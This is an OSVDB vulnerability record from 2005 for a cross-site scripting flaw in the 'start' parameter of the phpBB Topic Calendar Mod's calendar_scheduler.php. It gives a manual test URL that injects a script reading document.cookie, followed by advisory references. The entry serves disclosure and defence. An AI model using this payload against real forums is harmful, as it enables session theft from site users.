phpBB Topic Calendar Mod calendar_scheduler.php start Variable XSS

2005-03-23T03:33:01
ID OSVDB:14999
Type osvdb
Reporter OSVDB
Modified 2005-03-23T03:33:01

Description

Manual Testing Notes

http://[victim]/phpbb/calendar_scheduler.php?start=%22%3E%3Cscript%3E alert(document.cookie)%3C/script%3E

References:

Vendor URL: http://www.phpbb.com/phpBB/viewtopic.php?t=150857 Security Tracker: 1013554 Secunia Advisory ID:14659 Related OSVDB ID: 14998 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0413.html